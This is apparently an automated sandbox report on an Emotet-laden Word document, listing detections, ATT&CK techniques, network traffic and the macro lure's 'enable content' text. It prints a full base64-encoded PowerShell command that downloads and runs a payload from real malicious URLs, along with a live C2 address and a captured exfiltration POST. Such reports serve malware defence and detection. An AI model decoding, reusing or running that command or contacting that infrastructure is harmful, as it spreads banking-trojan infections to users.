Loading ...

Play interactive tourEdit tour

Analysis Report gyF9tONev4

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:206257
Start date:06.02.2020
Start time:04:37:58
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:gyF9tONev4 (renamed file extension from none to docm)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winDOCM@8/11@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 29.1% (good quality ratio 27.7%)
  • Quality average: 82.7%
  • Quality standard deviation: 25.8%
HCA Information:
  • Successful, ratio: 65%
  • Number of executed functions: 73
  • Number of non-executed functions: 368
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation11Hidden Files and Directories1Valid Accounts1Disabling Security Tools11Input Capture1System Time Discovery2Remote File Copy3Input Capture1Data Encrypted11Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaPowerShell4Valid Accounts1Access Token Manipulation1Software Packing1Network SniffingSecurity Software Discovery12Remote ServicesData from Removable MediaExfiltration Over Other Network MediumCommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting2Modify Existing Service11Process Injection1Deobfuscate/Decode Files or Information11Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API131New Service2New Service2Scripting2Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Cryptographic Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information1Account ManipulationSystem Information Discovery38Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceVirtualization/Sandbox Evasion2Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface113Path InterceptionScheduled TaskMasquerading221Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceService Execution12Logon ScriptsProcess InjectionHidden Files and Directories1Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessValid Accounts1Input PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationVirtualization/Sandbox Evasion2KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsAccess Token Manipulation1Private KeysSecurity Software DiscoveryReplication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe
Masquerade as Legitimate ApplicationRegsvr32New ServiceBypass User Account ControlProcess Injection1Securityd MemoryPermission Groups DiscoveryPass the TicketMan in the BrowserAlternate Network MediumsCustom Command and Control ProtocolDisk Content Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://bolehprediksi.com/wp-includes/ifrEFSqSw/Avira URL Cloud: Label: malware
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\209.exeAvira: detection malicious, Label: TR/AD.Emotet.lnvbd
Found malware configurationShow sources
Source: dvbthunk.exe.2356.6.memstrMalware Configuration Extractor: Emotet {"C2 list": ["45.55.179.121:8080", "45.55.179.121/juH7pVdg5"]}
Multi AV Scanner detection for domain / URLShow sources
Source: bolehprediksi.comVirustotal: Detection: 16%Perma Link
Source: http://bolehprediksi.com/wp-includes/ifrEFSqSw/Virustotal: Detection: 22%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\209.exeVirustotal: Detection: 77%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: gyF9tONev4.docmVirustotal: Detection: 63%Perma Link
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\209.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: gyF9tONev4.docmJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.0.209.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd
Source: 3.0.209.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd
Source: 5.0.dvbthunk.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd
Source: 6.0.dvbthunk.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003E207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,4_2_003E207B
Source: C:\Users\user\209.exeCode function: 4_2_003E1F11 CryptExportKey,4_2_003E1F11
Source: C:\Users\user\209.exeCode function: 4_2_003E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_003E1F75
Source: C:\Users\user\209.exeCode function: 4_2_003E215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,4_2_003E215A
Source: C:\Users\user\209.exeCode function: 4_2_003E1F56 CryptGetHashParam,4_2_003E1F56
Source: C:\Users\user\209.exeCode function: 4_2_003E1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_003E1FFC
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,6_2_00211F75
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00211FFC
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_0021207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,6_2_0021207B
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211F11 CryptExportKey,6_2_00211F11
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211F56 CryptGetHashParam,6_2_00211F56
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_0021215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,6_2_0021215A

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\209.exeCode function: 3_2_004305BD lstrlenA,FindFirstFileA,FindClose,3_2_004305BD
Source: C:\Users\user\209.exeCode function: 3_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_0042885D
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: bolehprediksi.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 43.255.154.93:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 43.255.154.93:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.2:49159 -> 45.55.179.121:8080
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.2:49159 -> 45.55.179.121:8080
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /wp-includes/ifrEFSqSw/ HTTP/1.1Host: bolehprediksi.comConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /juH7pVdg5 HTTP/1.1Referer: http://45.55.179.121/juH7pVdg5Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.55.179.121:8080Content-Length: 468Connection: Keep-AliveCache-Control: no-cacheData Raw: 6a 75 48 37 70 56 64 67 35 3d 75 75 56 45 43 35 25 32 42 44 6e 50 57 6b 58 5a 73 65 7a 4d 75 6e 58 42 34 35 49 7a 47 53 6d 61 54 79 42 73 69 70 71 6a 71 55 41 45 49 54 73 52 75 31 48 25 32 42 70 74 25 32 46 6b 50 46 4d 76 51 62 4c 53 7a 75 73 53 56 6e 25 32 42 61 75 48 76 63 4f 52 70 71 63 6f 35 25 32 42 44 25 32 42 72 30 49 6e 44 42 41 64 6f 65 6f 77 51 79 32 69 4b 4f 4d 72 43 4f 6c 57 59 78 55 6f 78 6e 61 62 4f 48 61 32 36 49 5a 55 66 74 42 44 6f 35 34 41 69 30 66 71 73 38 6d 67 6f 35 44 51 37 7a 25 32 46 51 61 35 39 31 25 32 46 4f 6a 31 6a 79 6e 67 5a 34 54 46 4a 7a 39 4b 48 52 36 50 7a 25 32 46 41 4b 68 38 5a 6d 74 74 70 54 46 4c 6b 69 39 77 6b 63 36 57 5a 54 4e 49 4c 78 63 69 67 69 31 38 43 73 77 79 41 6d 55 53 47 4b 37 33 64 51 72 66 34 4c 52 4c 6d 54 66 52 78 6f 54 5a 71 5a 39 37 32 32 6f 66 48 46 42 71 53 43 59 73 43 59 5a 6a 4b 6a 4b 67 46 66 7a 75 74 31 6e 77 4b 63 50 38 34 25 32 42 4b 4b 5a 62 33 64 6c 56 49 6c 67 46 43 67 56 4b 75 71 56 62 78 30 44 37 35 71 4a 45 4f 32 38 36 7a 57 75 65 4c 76 56 32 56 45 4c 42 46 76 58 62 52 6f 25 32 46 64 57 65 74 71 6c 42 5a 68 55 7a 39 50 73 73 52 6e 34 6a 41 39 59 79 64 5a 5a 34 42 56 54 32 69 54 36 42 56 46 57 6a 77 73 4a 31 57 64 6d 51 25 32 46 53 41 51 34 35 37 46 69 68 48 69 39 37 6c 44 6e 47 25 32 46 7a 38 54 53 36 34 30 49 45 78 56 35 32 59 6c 6f 4c 73 50 4a 4d 73 4f 74 79 74 4a 6b 54 33 49 6e 47 70 42 6a 56 71 4f 4a 4f 45 6d Data Ascii: juH7pVdg5=uuVEC5%2BDnPWkXZsezMunXB45IzGSmaTyBsipqjqUAEITsRu1H%2Bpt%2FkPFMvQbLSzusSVn%2BauHvcORpqco5%2BD%2Br0InDBAdoeowQy2iKOMrCOlWYxUoxnabOHa26IZUftBDo54Ai0fqs8mgo5DQ7z%2FQa591%2FOj1jyngZ4TFJz9KHR6Pz%2FAKh8ZmttpTFLki9wkc6WZTNILxcigi18CswyAmUSGK73dQrf4LRLmTfRxoTZqZ9722ofHFBqSCYsCYZjKjKgFfzut1nwKcP84%2BKKZb3dlVIlgFCgVKuqVbx0D75qJEO286zWueLvV2VELBFvXbRo%2FdWetqlBZhUz9PssRn4jA9YydZZ4BVT2iT6BVFWjwsJ1WdmQ%2FSAQ457FihHi97lDnG%2Fz8TS640IExV52YloLsPJMsOtytJkT3InGpBjVqOJOEm
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211383 InternetReadFile,6_2_00211383
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wp-includes/ifrEFSqSw/ HTTP/1.1Host: bolehprediksi.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: bolehprediksi.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /juH7pVdg5 HTTP/1.1Referer: http://45.55.179.121/juH7pVdg5Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.55.179.121:8080Content-Length: 468Connection: Keep-AliveCache-Control: no-cacheData Raw: 6a 75 48 37 70 56 64 67 35 3d 75 75 56 45 43 35 25 32 42 44 6e 50 57 6b 58 5a 73 65 7a 4d 75 6e 58 42 34 35 49 7a 47 53 6d 61 54 79 42 73 69 70 71 6a 71 55 41 45 49 54 73 52 75 31 48 25 32 42 70 74 25 32 46 6b 50 46 4d 76 51 62 4c 53 7a 75 73 53 56 6e 25 32 42 61 75 48 76 63 4f 52 70 71 63 6f 35 25 32 42 44 25 32 42 72 30 49 6e 44 42 41 64 6f 65 6f 77 51 79 32 69 4b 4f 4d 72 43 4f 6c 57 59 78 55 6f 78 6e 61 62 4f 48 61 32 36 49 5a 55 66 74 42 44 6f 35 34 41 69 30 66 71 73 38 6d 67 6f 35 44 51 37 7a 25 32 46 51 61 35 39 31 25 32 46 4f 6a 31 6a 79 6e 67 5a 34 54 46 4a 7a 39 4b 48 52 36 50 7a 25 32 46 41 4b 68 38 5a 6d 74 74 70 54 46 4c 6b 69 39 77 6b 63 36 57 5a 54 4e 49 4c 78 63 69 67 69 31 38 43 73 77 79 41 6d 55 53 47 4b 37 33 64 51 72 66 34 4c 52 4c 6d 54 66 52 78 6f 54 5a 71 5a 39 37 32 32 6f 66 48 46 42 71 53 43 59 73 43 59 5a 6a 4b 6a 4b 67 46 66 7a 75 74 31 6e 77 4b 63 50 38 34 25 32 42 4b 4b 5a 62 33 64 6c 56 49 6c 67 46 43 67 56 4b 75 71 56 62 78 30 44 37 35 71 4a 45 4f 32 38 36 7a 57 75 65 4c 76 56 32 56 45 4c 42 46 76 58 62 52 6f 25 32 46 64 57 65 74 71 6c 42 5a 68 55 7a 39 50 73 73 52 6e 34 6a 41 39 59 79 64 5a 5a 34 42 56 54 32 69 54 36 42 56 46 57 6a 77 73 4a 31 57 64 6d 51 25 32 46 53 41 51 34 35 37 46 69 68 48 69 39 37 6c 44 6e 47 25 32 46 7a 38 54 53 36 34 30 49 45 78 56 35 32 59 6c 6f 4c 73 50 4a 4d 73 4f 74 79 74 4a 6b 54 33 49 6e 47 70 42 6a 56 71 4f 4a 4f 45 6d Data Ascii: juH7pVdg5=uuVEC5%2BDnPWkXZsezMunXB45IzGSmaTyBsipqjqUAEITsRu1H%2Bpt%2FkPFMvQbLSzusSVn%2BauHvcORpqco5%2BD%2Br0InDBAdoeowQy2iKOMrCOlWYxUoxnabOHa26IZUftBDo54Ai0fqs8mgo5DQ7z%2FQa591%2FOj1jyngZ4TFJz9KHR6Pz%2FAKh8ZmttpTFLki9wkc6WZTNILxcigi18CswyAmUSGK73dQrf4LRLmTfRxoTZqZ9722ofHFBqSCYsCYZjKjKgFfzut1nwKcP84%2BKKZb3dlVIlgFCgVKuqVbx0D75qJEO286zWueLvV2VELBFvXbRo%2FdWetqlBZhUz9PssRn4jA9YydZZ4BVT2iT6BVFWjwsJ1WdmQ%2FSAQ457FihHi97lDnG%2Fz8TS640IExV52YloLsPJMsOtytJkT3InGpBjVqOJOEm
Urls found in memory or binary dataShow sources
Source: dvbthunk.exe, 00000006.00000002.1796251909.00303000.00000004.00000020.sdmp, dvbthunk.exe, 00000006.00000002.1796123834.0012B000.00000004.00000001.sdmpString found in binary or memory: http://45.55.179.121/juH7pVdg5
Source: 209.exe, 00000003.00000002.972678668.00489000.00000002.00020000.sdmp, 209.exe, 00000004.00000000.971931751.00489000.00000002.00020000.sdmp, dvbthunk.exe, 00000005.00000002.1005004120.00489000.00000002.00020000.sdmp, dvbthunk.exe, 00000006.00000000.1004320231.00489000.00000002.00020000.sdmp, 209.exe.1.drString found in binary or memory: http://www.codeproject.com/KB/dialog/xfontdialog.aspx

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_0042E2A3 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,3_2_0042E2A3
Source: C:\Users\user\209.exeCode function: 3_2_0042E2A5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,3_2_0042E2A5
Source: C:\Users\user\209.exeCode function: 3_2_0041A743 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_0041A743
Source: C:\Users\user\209.exeCode function: 3_2_0041501F GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_0041501F
Source: C:\Users\user\209.exeCode function: 3_2_00409DC5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_00409DC5
Source: C:\Users\user\209.exeCode function: 3_2_00431EC2 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_00431EC2
Source: C:\Users\user\209.exeCode function: 3_2_00437FA6 GetKeyState,GetKeyState,GetKeyState,3_2_00437FA6

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003EE20C4_2_003EE20C
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_0021E20C6_2_0021E20C
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABRAGkAeABnAHgAdQB3AHMAbQB3AGkAcABmAD0AJwBKAHIAcgBtAHIAZwB2AGQAZwBwACcAOwAkAEwAcwBiAGIAbABrAGgAcwBiAGsAdQBrACAAPQAgACcAMgAwADkAJwA7ACQASQB1AGMAbABrAGUAYQBwAD0AJwBaAGEAdwBzAGYAZQBzAHcAZQAnADsAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATABzAGIAYgBsAGsAaABzAGIAawB1AGsAKwAnAC4AZQB4AGUAJwA7ACQAUwBzAGMAeAB5AHMAdQBlAHEAPQAnAEkAcwBrAHMAdQB4AGUAYgBlAHYAdQBpACcAOwAkAFgAcQBpAHIAegBxAGUAbgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQATQBuAHQAYwByAHQAZQBwAGkAPQAnAGgAdAB0AHAAOgAvAC8AYgBvAGwAZQBoAHAAcgBlAGQAaQBrAHMAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaQBmAHIARQBGAFMAcQBTAHcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGUAcwBpAGcAbgBpAG4AZABpAGEALgBsAGkAdgBlAC8AagBzAC8AeQBjAEMASwBxAEgAbAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAYQBpAHIAMgBtAHAAcgBlAHMAcwAuAGMAbwBtAC8AbwBlAGkAdwBvAHMAawAzADYAagAzAHMAcwAvAHcAdAB1AGQAcwAvAHYAZQBkAE0ARABoAGMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB3AG8AcgBsAGQAbgBvAHQAaQBjAGkAYQBzAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAHYAdgBoAGEAYQAwADAAMAB2AGoALQBtAHEAOQA4AHYALQAxADkAOQA4ADgANQAxADgALwAqAGgAdAB0AHAAcwA6AC8ALwA5AGoAYQBiAGwAaQBzAHMALgBjAG8AbQAvAG8AaQByAHgAaQBvAC8AbgB3AGsAZABkAHIALwAnAC4AIgBzAFAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwBwAHoAbwBzAGEAaQB3AHEAPQAnAE4AbQBtAGYAawB5AHIAaABzAGUAaABuAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAZwBvAGgAawBzAG8AZgBpAGEAIABpAG4AIAAkAE0AbgB0AGMAcgB0AGUAcABpACkAewB0AHIAeQB7ACQAWABxAGkAcgB6AHEAZQBuAC4AIgBkAG8AdwBgAE4AYABsAE8AYQBgAGQARgBJAGwAZQAiACgAJABWAGcAbwBoAGsAcwBvAGYAaQBhACwAIAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAEMAeQBsAHgAagBqAGwAZABkAGUAZgBjAD0AJwBaAHYAdQBxAHUAawByAHAAeQBrAHYAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwApAC4AIgBsAGAARQBuAGcAVABoACIAIAAtAGcAZQAgADMAMwA2ADIANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAGAAZQBgAEEAVABlACIAKAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAFAAZwBjAHAAdABhAHgAawBsAHMAcgBwAD0AJwBJAGIAZgB3AHMAcABzAGkAbgB3ACcAOwBiAHIAZQBhAGsAOwAkAEEAbgB6AGEAYwBzAHkAcwBvAHgAPQAnAEkAeQB0AHAAawBiAHkAZQBpAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZAHoAdgBiAGgAcwBmAHoAagA9ACcASwBsAHEAegByAGoAdQBrAHkAcAAnAA==
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\209.exeCode function: 4_2_003E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_003E1F75
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,6_2_00211F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 4Screenshot OCR: Enable content button. a 13,2 '00%Q A GE)
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 0Screenshot OCR: Enable content button.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\209.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2291
Contains functionality to delete servicesShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003EE3D8 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,4_2_003EE3D8
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\209.exeCode function: 4_2_003E1D2B CreateProcessAsUserW,CreateProcessW,4_2_003E1D2B
Detected potential crypto functionShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0045400D3_2_0045400D
Source: C:\Users\user\209.exeCode function: 3_2_0044A0903_2_0044A090
Source: C:\Users\user\209.exeCode function: 3_2_004601D23_2_004601D2
Source: C:\Users\user\209.exeCode function: 3_2_0044C59A3_2_0044C59A
Source: C:\Users\user\209.exeCode function: 3_2_004607163_2_00460716
Source: C:\Users\user\209.exeCode function: 3_2_00446BF63_2_00446BF6
